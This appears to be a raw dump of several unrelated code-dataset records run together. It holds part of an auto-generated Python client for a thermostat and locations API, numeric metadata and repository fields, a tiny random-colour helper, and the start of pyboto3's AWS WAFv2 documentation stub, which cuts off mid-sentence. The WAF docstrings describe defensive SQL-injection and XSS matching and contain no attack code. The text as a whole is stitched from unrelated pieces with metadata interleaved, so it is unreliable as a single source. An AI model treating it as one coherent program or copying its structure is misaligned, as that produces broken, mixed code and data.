raise ApiValueError("Missing the required parameter `location_id` when calling `v2_devices_thermostats_device_id_priority_put`") # noqa: E501
# verify the required parameter 'device_id' is set
if ('device_id' not in local_var_params or
local_var_params['device_id'] is None):
raise ApiValueError("Missing the required parameter `device_id` when calling `v2_devices_thermostats_device_id_priority_put`") # noqa: E501
# verify the required parameter 'update_priority' is set
if ('update_priority' not in local_var_params or
local_var_params['update_priority'] is None):
raise ApiValueError("Missing the required parameter `update_priority` when calling `v2_devices_thermostats_device_id_priority_put`") # noqa: E501
collection_formats = {}
path_params = {}
if 'device_id' in local_var_params:
path_params['deviceId'] = local_var_params['device_id'] # noqa: E501
query_params = []
if 'apikey' in local_var_params:
query_params.append(('apikey', local_var_params['apikey'])) # noqa: E501
if 'location_id' in local_var_params:
query_params.append(('locationId', local_var_params['location_id'])) # noqa: E501
header_params = {}
if 'user_ref_id' in local_var_params:
header_params['UserRefId'] = local_var_params['user_ref_id'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'update_priority' in local_var_params:
body_params = local_var_params['update_priority']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['bearerAuth'] # noqa: E501
return self.api_client.call_api(
'/v2/devices/thermostats/{deviceId}/priority', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def v2_devices_thermostats_get(self, apikey, user_ref_id, location_id, **kwargs): # noqa: E501
"""Return all thermostats in a particular locationID # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v2_devices_thermostats_get(apikey, user_ref_id, location_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str apikey: Your Client ID (required)
:param str user_ref_id: Your user ID (required)
:param str location_id: Location ID (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: list[Thermostat]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.v2_devices_thermostats_get_with_http_info(apikey, user_ref_id, location_id, **kwargs) # noqa: E501
def v2_devices_thermostats_get_with_http_info(self, apikey, user_ref_id, location_id, **kwargs): # noqa: E501
"""Return all thermostats in a particular locationID # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v2_devices_thermostats_get_with_http_info(apikey, user_ref_id, location_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str apikey: Your Client ID (required)
:param str user_ref_id: Your user ID (required)
:param str location_id: Location ID (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(list[Thermostat], status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['apikey', 'user_ref_id', 'location_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method v2_devices_thermostats_get" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'apikey' is set
if ('apikey' not in local_var_params or
local_var_params['apikey'] is None):
raise ApiValueError("Missing the required parameter `apikey` when calling `v2_devices_thermostats_get`") # noqa: E501
# verify the required parameter 'user_ref_id' is set
if ('user_ref_id' not in local_var_params or
local_var_params['user_ref_id'] is None):
raise ApiValueError("Missing the required parameter `user_ref_id` when calling `v2_devices_thermostats_get`") # noqa: E501
# verify the required parameter 'location_id' is set
if ('location_id' not in local_var_params or
local_var_params['location_id'] is None):
raise ApiValueError("Missing the required parameter `location_id` when calling `v2_devices_thermostats_get`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'apikey' in local_var_params:
query_params.append(('apikey', local_var_params['apikey'])) # noqa: E501
if 'location_id' in local_var_params:
query_params.append(('locationId', local_var_params['location_id'])) # noqa: E501
header_params = {}
if 'user_ref_id' in local_var_params:
header_params['UserRefId'] = local_var_params['user_ref_id'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['bearerAuth'] # noqa: E501
return self.api_client.call_api(
'/v2/devices/thermostats', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[Thermostat]', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def v2_locations_get(self, apikey, user_ref_id, **kwargs): # noqa: E501
"""Get all locations, this will also return all devices within those locations # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v2_locations_get(apikey, user_ref_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str apikey: Your Client ID (required)
:param str user_ref_id: Your user ID (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: list[Location]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.v2_locations_get_with_http_info(apikey, user_ref_id, **kwargs) # noqa: E501
def v2_locations_get_with_http_info(self, apikey, user_ref_id, **kwargs): # noqa: E501
"""Get all locations, this will also return all devices within those locations # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v2_locations_get_with_http_info(apikey, user_ref_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str apikey: Your Client ID (required)
:param str user_ref_id: Your user ID (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(list[Location], status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['apikey', 'user_ref_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method v2_locations_get" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'apikey' is set
if ('apikey' not in local_var_params or
local_var_params['apikey'] is None):
raise ApiValueError("Missing the required parameter `apikey` when calling `v2_locations_get`") # noqa: E501
# verify the required parameter 'user_ref_id' is set
if ('user_ref_id' not in local_var_params or
local_var_params['user_ref_id'] is None):
raise ApiValueError("Missing the required parameter `user_ref_id` when calling `v2_locations_get`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'apikey' in local_var_params:
query_params.append(('apikey', local_var_params['apikey'])) # noqa: E501
header_params = {}
if 'user_ref_id' in local_var_params:
header_params['UserRefId'] = local_var_params['user_ref_id'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['bearerAuth'] # noqa: E501
return self.api_client.call_api(
'/v2/locations', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[Location]', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
| 51.935146
| 171
| 0.638248
| 6,022
| 49,650
| 4.956659
| 0.034706
| 0.049851
| 0.080673
| 0.03109
| 0.972294
| 0.968676
| 0.967168
| 0.964488
| 0.961707
| 0.951992
| 0
| 0.01395
| 0.286767
| 49,650
| 955
| 172
| 51.989529
| 0.828956
| 0.411098
| 0
| 0.75817
| 1
| 0
| 0.255285
| 0.07929
| 0
| 0
| 0
| 0
| 0
| 1
| 0.03268
| false
| 0
| 0.010893
| 0
| 0.076253
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
5a21175e91b472ed17f57ac76113c65fc04a5b0b
| 83
|
py
|
Python
|
utils/randomness.py
|
unixporn/upmo-discord
|
a90b62bb9aa2f29cdea4215dc56a47174e07961d
|
[
"MIT"
] | 7
|
2018-01-14T03:30:35.000Z
|
2021-06-28T12:44:14.000Z
|
utils/randomness.py
|
unixporn/upmo-discord
|
a90b62bb9aa2f29cdea4215dc56a47174e07961d
|
[
"MIT"
] | null | null | null |
utils/randomness.py
|
unixporn/upmo-discord
|
a90b62bb9aa2f29cdea4215dc56a47174e07961d
|
[
"MIT"
] | 2
|
2018-07-27T12:00:56.000Z
|
2020-12-09T03:31:19.000Z
|
import random
def random_colour():
return random.randint(0x000000, 0xFFFFFF)
| 13.833333
| 45
| 0.759036
| 10
| 83
| 6.2
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.114286
| 0.156627
| 83
| 5
| 46
| 16.6
| 0.771429
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.192771
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
5a250df0c5a9553b8b5b7f8794ef9bf62cb8b383
| 631,652
|
py
|
Python
|
pyboto3/wafv2.py
|
gehad-shaat/pyboto3
|
4a0c2851a8bc04fb1c71c36086f7bb257e48181d
|
[
"MIT"
] | 91
|
2016-12-31T11:38:37.000Z
|
2021-09-16T19:33:23.000Z
|
pyboto3/wafv2.py
|
gehad-shaat/pyboto3
|
4a0c2851a8bc04fb1c71c36086f7bb257e48181d
|
[
"MIT"
] | 7
|
2017-01-02T18:54:23.000Z
|
2020-08-11T13:54:02.000Z
|
pyboto3/wafv2.py
|
gehad-shaat/pyboto3
|
4a0c2851a8bc04fb1c71c36086f7bb257e48181d
|
[
"MIT"
] | 26
|
2016-12-31T13:11:00.000Z
|
2022-03-03T21:01:12.000Z
|
'''
The MIT License (MIT)
Copyright (c) 2016 WavyCloud
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
def associate_web_acl(WebACLArn=None, ResourceArn=None):
"""
Associates a Web ACL with a regional application resource, to protect the resource. A regional application can be an Application Load Balancer (ALB) or an API Gateway stage.
For AWS CloudFront, don\'t use this call. Instead, use your CloudFront distribution configuration. To associate a Web ACL, in the CloudFront call UpdateDistribution , set the web ACL ID to the Amazon Resource Name (ARN) of the Web ACL. For information, see UpdateDistribution .
See also: AWS API Documentation
Exceptions
:example: response = client.associate_web_acl(
WebACLArn='string',
ResourceArn='string'
)
:type WebACLArn: string
:param WebACLArn: [REQUIRED]\nThe Amazon Resource Name (ARN) of the Web ACL that you want to associate with the resource.\n
:type ResourceArn: string
:param ResourceArn: [REQUIRED]\nThe Amazon Resource Name (ARN) of the resource to associate with the web ACL.\nThe ARN must be in one of the following formats:\n\nFor an Application Load Balancer: ``arn:aws:elasticloadbalancing:region :account-id :loadbalancer/app/load-balancer-name /load-balancer-id ``\nFor an Amazon API Gateway stage: ``arn:aws:apigateway:region ::/restapis/api-id /stages/stage-name ``\n\n
:rtype: dict
ReturnsResponse Syntax
{}
Response Structure
(dict) --
Exceptions
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFNonexistentItemException
WAFV2.Client.exceptions.WAFUnavailableEntityException
WAFV2.Client.exceptions.WAFInvalidOperationException
:return: {}
:returns:
(dict) --
"""
pass
def can_paginate(operation_name=None):
"""
Check if an operation can be paginated.
:type operation_name: string
:param operation_name: The operation name. This is the same name\nas the method name on the client. For example, if the\nmethod name is create_foo, and you\'d normally invoke the\noperation as client.create_foo(**kwargs), if the\ncreate_foo operation can be paginated, you can use the\ncall client.get_paginator('create_foo').
"""
pass
def check_capacity(Scope=None, Rules=None):
"""
Returns the web ACL capacity unit (WCU) requirements for a specified scope and set of rules. You can use this to check the capacity requirements for the rules you want to use in a RuleGroup or WebACL .
AWS WAF uses WCUs to calculate and control the operating resources that are used to run your rules, rule groups, and web ACLs. AWS WAF calculates capacity differently for each rule type, to reflect the relative cost of each rule. Simple rules that cost little to run use fewer WCUs than more complex rules that use more processing power. Rule group capacity is fixed at creation, which helps users plan their web ACL WCU usage when they use a rule group. The WCU limit for web ACLs is 1,500.
See also: AWS API Documentation
Exceptions
:example: response = client.check_capacity(
Scope='CLOUDFRONT'|'REGIONAL',
Rules=[
{
'Name': 'string',
'Priority': 123,
'Statement': {
'ByteMatchStatement': {
'SearchString': b'bytes',
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {}
,
'UriPath': {}
,
'QueryString': {}
,
'Body': {}
,
'Method': {}
},
'TextTransformations': [
{
'Priority': 123,
'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
],
'PositionalConstraint': 'EXACTLY'|'STARTS_WITH'|'ENDS_WITH'|'CONTAINS'|'CONTAINS_WORD'
},
'SqliMatchStatement': {
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {}
,
'UriPath': {}
,
'QueryString': {}
,
'Body': {}
,
'Method': {}
},
'TextTransformations': [
{
'Priority': 123,
'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
]
},
'XssMatchStatement': {
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {}
,
'UriPath': {}
,
'QueryString': {}
,
'Body': {}
,
'Method': {}
},
'TextTransformations': [
{
'Priority': 123,
'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
]
},
'SizeConstraintStatement': {
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {}
,
'UriPath': {}
,
'QueryString': {}
,
'Body': {}
,
'Method': {}
},
'ComparisonOperator': 'EQ'|'NE'|'LE'|'LT'|'GE'|'GT',
'Size': 123,
'TextTransformations': [
{
'Priority': 123,
'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
]
},
'GeoMatchStatement': {
'CountryCodes': [
'AF'|'AX'|'AL'|'DZ'|'AS'|'AD'|'AO'|'AI'|'AQ'|'AG'|'AR'|'AM'|'AW'|'AU'|'AT'|'AZ'|'BS'|'BH'|'BD'|'BB'|'BY'|'BE'|'BZ'|'BJ'|'BM'|'BT'|'BO'|'BQ'|'BA'|'BW'|'BV'|'BR'|'IO'|'BN'|'BG'|'BF'|'BI'|'KH'|'CM'|'CA'|'CV'|'KY'|'CF'|'TD'|'CL'|'CN'|'CX'|'CC'|'CO'|'KM'|'CG'|'CD'|'CK'|'CR'|'CI'|'HR'|'CU'|'CW'|'CY'|'CZ'|'DK'|'DJ'|'DM'|'DO'|'EC'|'EG'|'SV'|'GQ'|'ER'|'EE'|'ET'|'FK'|'FO'|'FJ'|'FI'|'FR'|'GF'|'PF'|'TF'|'GA'|'GM'|'GE'|'DE'|'GH'|'GI'|'GR'|'GL'|'GD'|'GP'|'GU'|'GT'|'GG'|'GN'|'GW'|'GY'|'HT'|'HM'|'VA'|'HN'|'HK'|'HU'|'IS'|'IN'|'ID'|'IR'|'IQ'|'IE'|'IM'|'IL'|'IT'|'JM'|'JP'|'JE'|'JO'|'KZ'|'KE'|'KI'|'KP'|'KR'|'KW'|'KG'|'LA'|'LV'|'LB'|'LS'|'LR'|'LY'|'LI'|'LT'|'LU'|'MO'|'MK'|'MG'|'MW'|'MY'|'MV'|'ML'|'MT'|'MH'|'MQ'|'MR'|'MU'|'YT'|'MX'|'FM'|'MD'|'MC'|'MN'|'ME'|'MS'|'MA'|'MZ'|'MM'|'NA'|'NR'|'NP'|'NL'|'NC'|'NZ'|'NI'|'NE'|'NG'|'NU'|'NF'|'MP'|'NO'|'OM'|'PK'|'PW'|'PS'|'PA'|'PG'|'PY'|'PE'|'PH'|'PN'|'PL'|'PT'|'PR'|'QA'|'RE'|'RO'|'RU'|'RW'|'BL'|'SH'|'KN'|'LC'|'MF'|'PM'|'VC'|'WS'|'SM'|'ST'|'SA'|'SN'|'RS'|'SC'|'SL'|'SG'|'SX'|'SK'|'SI'|'SB'|'SO'|'ZA'|'GS'|'SS'|'ES'|'LK'|'SD'|'SR'|'SJ'|'SZ'|'SE'|'CH'|'SY'|'TW'|'TJ'|'TZ'|'TH'|'TL'|'TG'|'TK'|'TO'|'TT'|'TN'|'TR'|'TM'|'TC'|'TV'|'UG'|'UA'|'AE'|'GB'|'US'|'UM'|'UY'|'UZ'|'VU'|'VE'|'VN'|'VG'|'VI'|'WF'|'EH'|'YE'|'ZM'|'ZW',
]
},
'RuleGroupReferenceStatement': {
'ARN': 'string',
'ExcludedRules': [
{
'Name': 'string'
},
]
},
'IPSetReferenceStatement': {
'ARN': 'string'
},
'RegexPatternSetReferenceStatement': {
'ARN': 'string',
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {}
,
'UriPath': {}
,
'QueryString': {}
,
'Body': {}
,
'Method': {}
},
'TextTransformations': [
{
'Priority': 123,
'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
]
},
'RateBasedStatement': {
'Limit': 123,
'AggregateKeyType': 'IP',
'ScopeDownStatement': {'... recursive ...'}
},
'AndStatement': {
'Statements': [
{'... recursive ...'},
]
},
'OrStatement': {
'Statements': [
{'... recursive ...'},
]
},
'NotStatement': {
'Statement': {'... recursive ...'}
},
'ManagedRuleGroupStatement': {
'VendorName': 'string',
'Name': 'string',
'ExcludedRules': [
{
'Name': 'string'
},
]
}
},
'Action': {
'Block': {}
,
'Allow': {}
,
'Count': {}
},
'OverrideAction': {
'Count': {}
,
'None': {}
},
'VisibilityConfig': {
'SampledRequestsEnabled': True|False,
'CloudWatchMetricsEnabled': True|False,
'MetricName': 'string'
}
},
]
)
:type Scope: string
:param Scope: [REQUIRED]\nSpecifies whether this is for an AWS CloudFront distribution or for a regional application. A regional application can be an Application Load Balancer (ALB) or an API Gateway stage.\nTo work with CloudFront, you must also specify the Region US East (N. Virginia) as follows:\n\nCLI - Specify the Region when you use the CloudFront scope: --scope=CLOUDFRONT --region=us-east-1 .\nAPI and SDKs - For all calls, use the Region endpoint us-east-1.\n\n
:type Rules: list
:param Rules: [REQUIRED]\nAn array of Rule that you\'re configuring to use in a rule group or web ACL.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nA single rule, which you can use in a WebACL or RuleGroup to identify web requests that you want to allow, block, or count. Each rule includes one top-level Statement that AWS WAF uses to identify matching web requests, and parameters that govern how AWS WAF handles them.\n\nName (string) -- [REQUIRED]The name of the rule. You can\'t change the name of a Rule after you create it.\n\nPriority (integer) -- [REQUIRED]If you define more than one Rule in a WebACL , AWS WAF evaluates each request against the Rules in order based on the value of Priority . AWS WAF processes rules with lower priority first. The priorities don\'t need to be consecutive, but they must all be different.\n\nStatement (dict) -- [REQUIRED]The AWS WAF processing statement for the rule, for example ByteMatchStatement or SizeConstraintStatement .\n\nByteMatchStatement (dict) --A rule statement that defines a string match search for AWS WAF to apply to web requests. The byte match statement provides the bytes to search for, the location in requests that you want AWS WAF to search, and other settings. The bytes to search for are typically a string that corresponds with ASCII characters. In the AWS WAF console and the developer guide, this is refered to as a string match statement.\n\nSearchString (bytes) -- [REQUIRED]A string value that you want AWS WAF to search for. AWS WAF searches only in the part of web requests that you designate for inspection in FieldToMatch . The maximum length of the value is 50 bytes.\nValid values depend on the component that you specify for inspection in FieldToMatch :\n\nMethod : The HTTP method that you want AWS WAF to search for. This indicates the type of operation specified in the request.\nUriPath : The value that you want AWS WAF to search for in the URI path, for example, /images/daily-ad.jpg .\n\nIf SearchString includes alphabetic characters A-Z and a-z, note that the value is case sensitive.\n\nIf you\'re using the AWS WAF API\nSpecify a base64-encoded version of the value. The maximum length of the value before you base64-encode it is 50 bytes.\nFor example, suppose the value of Type is HEADER and the value of Data is User-Agent . If you want to search the User-Agent header for the value BadBot , you base64-encode BadBot using MIME base64-encoding and include the resulting value, QmFkQm90 , in the value of SearchString .\n\nIf you\'re using the AWS CLI or one of the AWS SDKs\nThe value that you want AWS WAF to search for. The SDK automatically base64 encodes the value.\n\nFieldToMatch (dict) -- [REQUIRED]The part of a web request that you want AWS WAF to inspect. For more information, see FieldToMatch .\n\nSingleHeader (dict) --Inspect a single header. Provide the name of the header to inspect, for example, User-Agent or Referer . This setting isn\'t case sensitive.\n\nName (string) -- [REQUIRED]The name of the query header to inspect.\n\n\n\nSingleQueryArgument (dict) --Inspect a single query argument. Provide the name of the query argument to inspect, such as UserName or SalesRegion . The name can be up to 30 characters long and isn\'t case sensitive.\nThis is used only to indicate the web request component for AWS WAF to inspect, in the FieldToMatch specification.\n\nName (string) -- [REQUIRED]The name of the query argument to inspect.\n\n\n\nAllQueryArguments (dict) --Inspect all query arguments.\n\nUriPath (dict) --Inspect the request URI path. This is the part of a web request that identifies a resource, for example, /images/daily-ad.jpg .\n\nQueryString (dict) --Inspect the query string. This is the part of a URL that appears after a ? character, if any.\n\nBody (dict) --Inspect the request body, which immediately follows the request headers. This is the part of a request that contains any additional data that you want to send to your web server as the HTTP request body, such as data from a form.\nNote that only the first 8 KB (8192 bytes) of the request body are forwarded to AWS WAF for inspection by the underlying host service. If you don\'t need to inspect more than 8 KB, you can guarantee that you don\'t allow additional bytes in by combining a statement that inspects the body of the web request, such as ByteMatchStatement or RegexPatternSetReferenceStatement , with a SizeConstraintStatement that enforces an 8 KB size limit on the body of the request. AWS WAF doesn\'t support inspecting the entire contents of web requests whose bodies exceed the 8 KB limit.\n\nMethod (dict) --Inspect the HTTP method. The method indicates the type of operation that the request is asking the origin to perform.\n\n\n\nTextTransformations (list) -- [REQUIRED]Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection. If you specify one or more transformations in a rule statement, AWS WAF performs all transformations on the content of the request component identified by FieldToMatch , starting from the lowest priority setting, before inspecting the content for a match.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nText transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection.\n\nPriority (integer) -- [REQUIRED]Sets the relative processing order for multiple transformations that are defined for a rule statement. AWS WAF processes all transformations, from lowest priority to highest, before inspecting the transformed content. The priorities don\'t need to be consecutive, but they must all be different.\n\nType (string) -- [REQUIRED]You can specify the following transformation types:\n\nCMD_LINE\nWhen you\'re concerned that attackers are injecting an operating system command line command and using unusual formatting to disguise some or all of the command, use this option to perform the following transformations:\n\nDelete the following characters: ' \' ^\nDelete spaces before the following characters: / (\nReplace the following characters with a space: , ;\nReplace multiple spaces with one space\nConvert uppercase letters (A-Z) to lowercase (a-z)\n\n\nCOMPRESS_WHITE_SPACE\nUse this option to replace the following characters with a space character (decimal 32):\n\nf, formfeed, decimal 12\nt, tab, decimal 9\nn, newline, decimal 10\nr, carriage return, decimal 13\nv, vertical tab, decimal 11\nnon-breaking space, decimal 160\n\n\nCOMPRESS_WHITE_SPACE also replaces multiple spaces with one space.HTML_ENTITY_DECODE\n\nUse this option to replace HTML-encoded characters with unencoded characters. HTML_ENTITY_DECODE performs the following operations:\n\nReplaces (ampersand)quot; with '\nReplaces (ampersand)nbsp; with a non-breaking space, decimal 160\nReplaces (ampersand)lt; with a 'less than' symbol\nReplaces (ampersand)gt; with >\nReplaces characters that are represented in hexadecimal format, (ampersand)#xhhhh; , with the corresponding characters\nReplaces characters that are represented in decimal format, (ampersand)#nnnn; , with the corresponding characters\n\n\nLOWERCASE\nUse this option to convert uppercase letters (A-Z) to lowercase (a-z).\n\nURL_DECODE\nUse this option to decode a URL-encoded value.\n\nNONE\nSpecify NONE if you don\'t want any text transformations.\n\n\n\n\n\nPositionalConstraint (string) -- [REQUIRED]The area within the portion of a web request that you want AWS WAF to search for SearchString . Valid values include the following:\n\nCONTAINS\nThe specified part of the web request must include the value of SearchString , but the location doesn\'t matter.\n\nCONTAINS_WORD\nThe specified part of the web request must include the value of SearchString , and SearchString must contain only alphanumeric characters or underscore (A-Z, a-z, 0-9, or _). In addition, SearchString must be a word, which means that both of the following are true:\n\nSearchString is at the beginning of the specified part of the web request or is preceded by a character other than an alphanumeric character or underscore (_). Examples include the value of a header and ;BadBot .\nSearchString is at the end of the specified part of the web request or is followed by a character other than an alphanumeric character or underscore (_), for example, BadBot; and -BadBot; .\n\n\nEXACTLY\nThe value of the specified part of the web request must exactly match the value of SearchString .\n\nSTARTS_WITH\nThe value of SearchString must appear at the beginning of the specified part of the web request.\n\nENDS_WITH\nThe value of SearchString must appear at the end of the specified part of the web request.\n\n\n\nSqliMatchStatement (dict) --Attackers sometimes insert malicious SQL code into web requests in an effort to extract data from your database. To allow or block web requests that appear to contain malicious SQL code, create one or more SQL injection match conditions. An SQL injection match condition identifies the part of web requests, such as the URI or the query string, that you want AWS WAF to inspect. Later in the process, when you create a web ACL, you specify whether to allow or block requests that appear to contain malicious SQL code.\n\nFieldToMatch (dict) -- [REQUIRED]The part of a web request that you want AWS WAF to inspect. For more information, see FieldToMatch .\n\nSingleHeader (dict) --Inspect a single header. Provide the name of the header to inspect, for example, User-Agent or Referer . This setting isn\'t case sensitive.\n\nName (string) -- [REQUIRED]The name of the query header to inspect.\n\n\n\nSingleQueryArgument (dict) --Inspect a single query argument. Provide the name of the query argument to inspect, such as UserName or SalesRegion . The name can be up to 30 characters long and isn\'t case sensitive.\nThis is used only to indicate the web request component for AWS WAF to inspect, in the FieldToMatch specification.\n\nName (string) -- [REQUIRED]The name of the query argument to inspect.\n\n\n\nAllQueryArguments (dict) --Inspect all query arguments.\n\nUriPath (dict) --Inspect the request URI path. This is the part of a web request that identifies a resource, for example, /images/daily-ad.jpg .\n\nQueryString (dict) --Inspect the query string. This is the part of a URL that appears after a ? character, if any.\n\nBody (dict) --Inspect the request body, which immediately follows the request headers. This is the part of a request that contains any additional data that you want to send to your web server as the HTTP request body, such as data from a form.\nNote that only the first 8 KB (8192 bytes) of the request body are forwarded to AWS WAF for inspection by the underlying host service. If you don\'t need to inspect more than 8 KB, you can guarantee that you don\'t allow additional bytes in by combining a statement that inspects the body of the web request, such as ByteMatchStatement or RegexPatternSetReferenceStatement , with a SizeConstraintStatement that enforces an 8 KB size 